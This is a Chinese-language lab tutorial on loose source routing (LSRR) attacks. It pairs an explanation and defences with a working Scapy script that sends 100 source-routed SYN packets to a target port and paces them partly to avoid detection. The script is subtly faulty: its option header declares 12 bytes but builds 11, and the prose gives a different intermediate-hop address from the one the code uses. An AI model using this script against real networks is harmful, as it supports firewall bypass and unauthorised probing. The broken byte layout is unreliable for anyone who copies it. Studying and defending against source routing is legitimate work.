使用 Scapy 库编写源路由攻击脚本

一、介绍

源路由攻击是一种网络攻击方法，攻击者通过利用IP数据包中的源路由选项来控制数据包的传输路径，从而绕过安全设备或防火墙，直接访问目标系统。源路由功能允许数据包的发送方指定数据包通过的路径，而不是由路由器根据路由表动态决定路径。虽然源路由在某些网络管理和诊断中有其合法用途，但也可以被恶意利用进行攻击。

1.1 源路由类型

1. 松散源路由（Loose Source Routing, LSRR） ：
   • 数据包必须经过指定的一些中间节点，但在这些节点之间的路径由路由器自行决定。
2. 严格源路由（Strict Source Routing, SSRR） ：
   • 数据包必须严格按照指定的路径经过所有中间节点。

1.2 攻击原理

在源路由攻击中，攻击者利用源路由选项创建数据包，并指定这些数据包应通过的路径。通过这种方式，攻击者可以：

• 绕过防火墙和其他安全设备。
• 访问本来无法直接访问的网络部分。
• 进行网络探测和信息收集。
• 实施其他类型的网络攻击，如中间人攻击。

1.3 防御措施

为了防止源路由攻击，可以采取以下措施：

1. 禁用源路由功能：

   • 在网络设备（如路由器、防火墙）上禁用源路由功能。这通常可以通过设备的配置接口完成。

2. 配置防火墙规则：

   • 配置防火墙规则以丢弃包含源路由选项的数据包。许多现代防火墙默认会丢弃这些数据包。

3. 使用入侵检测系统（IDS）：

   • 部署入侵检测系统，如Snort，监控网络流量，检测和报警包含源路由选项的数据包。

4. 网络分段和隔离：

   • 通过网络分段和隔离，限制攻击者能够到达的网络范围，减少攻击面。

二、实验环境

• 攻击者IP地址：192.168.1.103
• 中间节点IP地址：192.168.134.147
• 目标IP地址：192.168.1.128

三、实验步骤

1. 配置攻击环境：确保攻击者计算机安装了Scapy，并且能够访问中间节点和目标。

2. 使用Scapy构造带有源路由选项的IP包：

   我们将构造一百个数据包，使其经过中间节点192.168.1.133再到达目标192.168.1.128。

from scapy.all import *
from scapy.layers.inet import IPOption
import time

# 攻击者IP地址（源IP）
attacker_ip = "192.168.1.103"

# 中间节点IP地址
middle_node_ip = "192.168.134.147"

# 目标IP地址
target_ip = "192.168.1.128"

# 构造带有源路由选项的IP包
lsrr_option = IPOption(b'\x83\x0c\x04' + inet_aton(middle_node_ip) + inet_aton(target_ip))

ip_layer = IP(src=attacker_ip, dst=target_ip, options=[lsrr_option])
tcp_layer = TCP(dport=8030, flags='S')

# 创建完整的数据包
packet = ip_layer / tcp_layer

# 发送一百个数据包，每个之间间隔0.1秒
for _ in range(100):
    send(packet)
    time.sleep(0.1)  # 设置间隔时间，单位为秒

代码解析：

1. 导入模块 ：
   • from scapy.all import *：导入Scapy的所有功能。
   • from scapy.layers.inet import IPOption：从Scapy的inet层导入IPOption类，用于设置IP选项。
   • import time：导入Python标准库的time模块，用于控制时间间隔。
2. 定义IP地址 ：
   • attacker_ip：定义攻击者的IP地址。
   • middle_node_ip：定义中间节点的IP地址。
   • target_ip：定义目标的IP地址。
3. 构造源路由选项 ：
   • IPOption：创建一个IP选项实例。
   • b'\x83\x0c\x04'：表示LSRR选项的类型和长度。
     • \x83：LSRR选项类型（131）。
     • \x0c：选项长度（12字节）。
     • \x04：指针位置（指向中间节点的IP地址）。
   • inet_aton(middle_node_ip)：将中间节点IP地址转换为二进制格式。
   • inet_aton(target_ip)：将目标IP地址转换为二进制格式。
   • 将这些部分连接起来，形成完整的LSRR选项。
4. 构造IP层 ：
   • IP：创建一个IP包实例。
   • src=attacker_ip：设置源IP地址。
   • dst=target_ip：设置目标IP地址。
   • options=[lsrr_option]：设置IP选项为之前构造的LSRR选项。
5. 构造TCP层 ：
   • TCP：创建一个TCP包实例。
   • dport=8030：设置目标端口为8030。
   • flags='S'：设置TCP标志为SYN（表示连接请求）。
6. 创建完整的数据包 ：
   • 使用/操作符将IP层和TCP层组合起来，形成一个完整的数据包。
7. 发送数据包 ：
   • for _ in range(100)：创建一个循环，循环100次。
   • send(packet)：使用Scapy的send函数发送构造好的数据包。
   • time.sleep(0.1)：在每次发送后，暂停0.1秒。这是为了控制发送速率，避免过快的发送可能导致网络拥堵或被检测。

注意： 确认你所使用的网络设备是否支持源路由选项。一些现代网络设备默认会禁用这种功能

四、防御源路由攻击

1. 禁用源路由选项：

   • 在路由器和防火墙中禁用IP包的源路由选项。

2. 过滤和监控：

   • 使用入侵检测系统（IDS）和防火墙规则过滤包含源路由选项的数据包。
   • 定期监控网络流量，检测和响应异常行为。

3. 使用加密和认证：

   • 使用安全协议（如HTTPS、SSH）加密通信，防止中间人攻击。
   • 在关键服务中实施强身份认证机制。

五、总结

通过上述实验，我们展示了如何利用源路由选项进行网络攻击。这种攻击可以用于多种目的，包括绕过访问控制和实施中间人攻击。为了保护网络免受源路由攻击，网络管理员应采取适当的安全措施，如禁用源路由选项、使用入侵检测系统以及加密网络通信。

再次强调，这些技术和方法应仅用于合法的安全测试和研究，未经授权的使用是非法的。